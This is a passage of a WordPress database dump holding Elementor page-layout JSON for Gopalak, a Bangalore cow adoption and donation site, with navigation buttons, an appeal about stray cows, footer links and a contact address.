",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12193,2002,'_elementor_page_assets','a:0:{}'),(12206,2004,'_elementor_edit_mode','builder'),(12207,2004,'_elementor_template_type','wp-page'),(12208,2004,'_elementor_version','3.7.8'),(12209,2004,'_wp_page_template','elementor_canvas'),(12210,2004,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12211,2004,'_elementor_page_assets','a:0:{}'),(12213,2005,'_elementor_edit_mode','builder'),(12214,2005,'_elementor_template_type','wp-page'),(12215,2005,'_elementor_version','3.7.8'),(12216,2005,'_wp_page_template','elementor_canvas'),(12217,2005,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"